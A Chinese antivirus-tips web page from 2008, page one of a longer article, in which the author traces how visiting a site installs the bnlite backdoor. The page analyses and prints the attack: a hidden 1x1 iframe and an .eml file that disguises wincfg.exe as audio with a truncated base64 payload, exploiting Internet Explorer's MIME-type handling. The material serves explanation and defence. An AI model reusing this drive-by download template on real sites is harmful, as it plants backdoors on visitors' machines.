当前位置：清风网络学院 → 操作系统 → 木马病毒 → 杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集


	精品推荐


特别推荐

·趋势：新反病毒技术亟待成熟

·病毒反抗杀毒软件主要手段

·文件关联型木马的特殊化查杀

·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集


热点TOP10

·QQ聊天记录偷窥和QQ视频欺骗

·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集

·俄罗斯杀毒软件大蜘蛛登陆中国

·不再怕电脑病毒电脑中毒后的6招处理方法

·卡巴斯基6.0下载卡巴斯基6.0key激活码

·警惕高危木马病毒随意下载病毒窃密码

·一个防止U盘病毒的小技巧

·卡巴斯基2009 Beta版初步试用感受

·不是这么简单揭秘网友十大杀毒误区

·江民杀毒软件 KV2008 正式版免费下载

杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集

日期：2008年3月22日作者：查看:[大字体中字体小字体]

　　运行金山毒霸，报告发现“backdoor
bnlite”，哦，原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大（只有6.5K），但它的功能可不少：具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信（报告服务端所在的IP地址）、上传下载……如果你中了该木马，那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的ftp服务，这样别人就有全部权限进入你的电脑了！控制你的电脑将非常容易！

　　让我感兴趣的是，木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全” →“自定义安全级别”，将ActiveX相关选项全部都禁用，再浏览该网页，wincfg.exe还是下载并运行了！看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止，再浏览该网页，哈哈！这回wincfg.exe不再下载了。

　　我们来看看wincfg.exe是如何下载到浏览者计算机上的，在该网页上点击鼠标右键，选择其中的“查看源代码”，在网页代码最后面发现了可疑的一句：
IFRAME
src="wincfg.eml" width=1
height=1

　　注意到其中的“wincfg.eml”了吗？大家都知道eml为邮件格式，网页中要eml文件干什么呢？非常可疑！再次浏览该网页，再看看任务管理器，wincfg.exe进程又回来了，原来问题就在这个文件上！既然问题在这文件上，当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来，鼠标刚点上去，wincfg.exe又被执行了，真是阴魂不散啊！

打开a.eml，发现其内容如下：

From:
"xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57
+800
MIME-Version: 1.0
Content-Type:
multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority:
3
X-MSMail-Priority: Normal
X-Unsent:
1

--1
Content-Type:
multipart/alternative;
boundary="2"

--2
Content-Type:
text/html;
charset="gb2312"
Content-Transfer-Encoding:
quoted-printable

HTML>
HEAD>
/HEAD>
BODY
bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0
width=3D0>

/BODY>

--2--

--1
Content-Type:
audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding:
base64
Content-ID:

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)

--1

你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符，就是wincfg.exe经过base64编码的内容。上面这些代码中，关键的是下面这一段：

Content-Type:
audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding:
base64
Content-ID:

　　其中，name="wincfg.exe"这一句定义了文件名称，在此为wincfg.exe。
而这一句：Content-Transfer-Encoding:
base64则定义了代码格式为base64。

　　从这句Content-ID:
开始才是代码的起步，“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码，这个以 BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因！到此我就明白了，其实，所谓的浏览网页会中木马，只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已，说白了就是利用了错误的MIME头进行攻击。

　　1.MIME简介
　　MIME(Multipurpose
Internet Mail
Extentions)，一般译作“多用途的网际邮件扩充协议”。顾名思义，它可以传送多媒体文件，在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息：e-mail，usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型，其中有一行叫作Content-type的语句，它用来指明传递的就是MIME类型的文件(如text/html或 text/plain)。

上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] 下一页

上一篇:N款教程，款款精品

下一篇:SMTP命令简介

·电脑高手的140个电脑技巧

·网站赚钱的四个技巧

·QQ空间免费换皮肤代码

·qq空间皮肤背景代码：QQ空间不用Q币更换主页皮肤方法

·杀毒技巧系列:杀毒、防恶意代码、脚本病毒的不完全合集

·Windows XP的20个超级实用技巧大全

	\| 帮助(？) \| 版权声明 \| 友情连接 \| 关于我们 \| 信息发布
Copyright 2007 www.viphot.com All Rights Reserved.	鄂ICP备05000083号Powered by:viphot